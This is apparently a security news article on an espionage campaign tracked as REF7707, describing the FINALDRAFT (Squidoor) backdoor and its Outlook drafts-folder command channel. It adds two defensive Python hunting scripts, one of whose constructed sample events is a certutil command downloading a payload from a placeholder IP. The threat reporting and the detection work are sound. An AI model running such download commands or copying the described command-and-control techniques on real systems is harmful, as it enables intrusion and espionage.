Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts.
The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university, both located in Southeast Asia.
"While the REF7707 campaign is characterized by a well-engineered, highly capable, novel intrusion set, the campaign owners exhibited poor campaign management and inconsistent evasion practices," security researchers Andrew Pease and Seth Goodwin said in a technical analysis.
The exact initial access vector used in the attacks is currently not clear, although it has been observed that Microsoft's certutil application is used to download additional payloads from a web server associated with the Foreign Ministry.
The certutil commands used to retrieve the suspicious files have been found to be executed via the Windows Remote Management's Remote Shell plugin (WinrsHost.exe) from an unknown source system on a connected network.
"It indicates that attackers already possessed valid network credentials and were using them for lateral movement from a previously compromised host in the environment," the researchers noted.
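The lateral-movement pattern above (certutil.exe fetching a payload while its parent is WinrsHost.exe) is a good hunting signature. The following is an added detection example written for this article, not code from Elastic Security Labs; the process-creation events are constructed in a simplified Sysmon-like shape, and the hosts, users and URL in them are placeholders.

```python
"""Detection logic (added example, not from the Elastic report) for the
lateral-movement pattern described above: certutil.exe downloading a
payload while its parent is WinrsHost.exe (WinRM Remote Shell).
Log records below are constructed, not real telemetry."""
import re

# Constructed process-creation events in a simplified Sysmon-like shape.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\WinrsHost.exe", "user": "CORP\\svc_admin",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/update.bin C:\\Users\\Public\\update.bin"},
    {"parent": r"C:\Windows\explorer.exe", "user": "CORP\\alice",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify cert.cer"},
    {"parent": r"C:\Windows\System32\WinrsHost.exe", "user": "CORP\\svc_admin",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\svchost.exe", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f https://crl.example.com/root.crl root.crl"},
]

# certutil switches that cause a network fetch, combined with a URL argument.
DOWNLOAD_SWITCH = re.compile(r"(?i)-(urlcache|verifyctl)\b")
URL_PATTERN = re.compile(r"(?i)\bhttps?://\S+")

def is_certutil_download(event):
    """True when certutil is invoked in a way that retrieves a remote file."""
    if not event["image"].lower().endswith("\\certutil.exe"):
        return False
    cmd = event["cmdline"]
    return bool(DOWNLOAD_SWITCH.search(cmd) and URL_PATTERN.search(cmd))

def classify(event):
    """Return a severity label for one process-creation event, or None."""
    if not is_certutil_download(event):
        return None
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    # WinrsHost.exe as parent means the command arrived over WinRM from
    # another host: the lateral-movement pattern in the REF7707 report.
    if parent == "winrshost.exe":
        return "high"
    return "medium"

def hunt(events):
    """Return (index, severity) for every event that matches."""
    return [(i, sev) for i, e in enumerate(events) if (sev := classify(e))]
```

Legitimate CRL refreshes under svchost.exe still surface as "medium", so the parent-process check is what separates routine certutil use from the remote-shell case.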
The first of the files to be executed is malware named PATHLOADER, which executes encrypted shellcode received from an external server. The decrypted shellcode, dubbed FINALDRAFT, is then injected into the memory of a newly spawned "mspaint.exe" process.
Written in C++, FINALDRAFT is a full-featured remote administration tool that comes fitted with capabilities to execute additional modules on the fly and abuses the Outlook email service via the Microsoft Graph API for command-and-control (C2) purposes. It's worth noting that the abuse of the Graph API has been previously detected in another backdoor named SIESTAGRAPH.
The communication mechanism entails parsing the commands stored in the mailbox's drafts folder and writing the results of the execution into new draft emails for each command. FINALDRAFT registers 37 command handlers that are designed around process injection, file manipulation, and network proxy capabilities.
It's also engineered to start new processes with stolen NTLM hashes and to execute PowerShell commands without invoking the "powershell.exe" binary. Instead, it patches several APIs to evade Event Tracing for Windows (ETW) and launches PowerPick, a legitimate utility that's part of the Empire post-exploitation toolkit.
ELF binary artifacts uploaded to VirusTotal from Brazil and the United States indicate the presence of a Linux variant of FINALDRAFT that features similar C2 functionality. The Linux version, for its part, can execute shell commands via popen and delete itself from the system.
"The completeness of the tools and the level of engineering involved suggest that the developers are well-organized," the researchers said. "The extended time frame of the operation and evidence from our telemetry suggest it's likely an espionage-oriented campaign."
Update
Palo Alto Networks Unit 42, which is tracking REF7707 under the moniker CL-STA-0049, said the suspected Chinese activity cluster has targeted governments, defense, telecommunication, education and aviation sectors in Southeast Asia and South America since at least March 2023.
"The observed activity includes collecting sensitive information from compromised organizations, as well as obtaining information about high-ranking officials and individuals at those organizations," security researchers Lior Rochberger and Tom Fakterman said.
The attack chains are known to weaponize vulnerabilities in Internet Information Services (IIS) servers to drop web shells, allowing the threat actors to remotely access and deploy a sophisticated backdoor dubbed FINALDRAFT (aka Squidoor) that's capable of infecting both Windows and Linux systems.
It's capable of maintaining access, moving laterally, creating covert communication channels with its operators, and harvesting information of interest from the targeted entities. It can also receive instructions to execute arbitrary commands, inject payloads into selected processes, exfiltrate files, enumerate running processes, and deliver additional payloads.
Squidoor is "engineered for an enhanced level of stealth," Unit 42 pointed out, adding its multi-platform implementations "enables the malware to infiltrate diverse network ecosystems, potentially compromising a broader range of targets and complicating detection and mitigation efforts across heterogeneous infrastructures."
A key aspect of the backdoor is its support for different methods of C2 communication, which makes it possible for the adversaries to adapt to various scenarios and evade detection:
- HTTP-based communication
- Reverse TCP connection to a remote server
- Reverse UDP connection to a remote server
- Outlook mail API
- Domain Name System (DNS) tunneling
- Internet Control Message Protocol (ICMP) tunneling
- A mail client retrieved from the configuration file
- Named pipes-based communication (only internal and for Windows)
"After sending the initial beacon, Squidoor starts to query the email account for commands," the researchers said. "If such an email exists, Squidoor will retrieve its contents and delete it from the attacker's mailbox. This mechanism allows the malware to receive commands or additional malicious code from its C2 server disguised as innocent-looking Outlook network traffic."
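The drafts-folder dead drop described by both Elastic (commands read from Drafts, results written back as new drafts) and Unit 42 (commands retrieved and then deleted) leaves a distinctive trace: items churn through Drafts without ever being sent, created by one client and removed by another. The following is an added hunting example written for this article, not code from either vendor; the events are constructed in a simplified mailbox-audit shape whose operation names are modelled on Exchange mailbox auditing, and the mailboxes and client names are placeholders.

```python
"""Added detection example (not from the Elastic or Unit 42 reports) for the
Outlook drafts-folder C2 pattern: draft items created by one client and
hard-deleted by a different client shortly afterwards, with no Send event.
Events are constructed in a simplified mailbox-audit shape."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed: one mailbox used as a C2 dead drop, one normal user.
# Fields: mailbox, operation, folder, item_id, client app, timestamp
SAMPLE_EVENTS = [
    ("ops@corp.example", "Create", "Drafts", "d1", "OWA", "2024-11-12T09:00:00"),
    ("ops@corp.example", "MailItemsAccessed", "Drafts", "d1", "GraphApp", "2024-11-12T09:00:40"),
    ("ops@corp.example", "HardDelete", "Drafts", "d1", "GraphApp", "2024-11-12T09:00:41"),
    ("ops@corp.example", "Create", "Drafts", "d2", "GraphApp", "2024-11-12T09:00:45"),
    ("ops@corp.example", "Create", "Drafts", "d3", "OWA", "2024-11-12T09:05:00"),
    ("ops@corp.example", "HardDelete", "Drafts", "d3", "GraphApp", "2024-11-12T09:05:30"),
    ("alice@corp.example", "Create", "Drafts", "a1", "Outlook", "2024-11-12T09:10:00"),
    ("alice@corp.example", "Send", "Drafts", "a1", "Outlook", "2024-11-12T09:12:00"),
]

def draft_dead_drops(events, max_lifetime=timedelta(minutes=10), threshold=2):
    """Return {mailbox: count} for mailboxes where at least `threshold` draft
    items were created by one client and hard-deleted by a different client
    within `max_lifetime`, without a Send in between (heuristic, not proof)."""
    created, sent = {}, set()
    deleted_unsent = defaultdict(int)
    for mailbox, op, folder, item, client, ts in sorted(events, key=lambda e: e[5]):
        if folder != "Drafts":
            continue
        key, t = (mailbox, item), datetime.fromisoformat(ts)
        if op == "Create":
            created[key] = (client, t)
        elif op == "Send":
            sent.add(key)
        elif op == "HardDelete" and key in created and key not in sent:
            creator, created_at = created[key]
            # Operator drops the draft via one client, the implant removes it
            # via another: the split is the signal, not deletion by itself.
            if creator != client and t - created_at <= max_lifetime:
                deleted_unsent[mailbox] += 1
    return {m: n for m, n in deleted_unsent.items() if n >= threshold}
```

Draft d2, created by the implant-side client as a result message and never deleted, is deliberately not counted, so the rule keys on the command-retrieval half of the exchange.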
(The story was updated after publication on February 28, 2025, to include additional insights about FINALDRAFT from Unit 42.)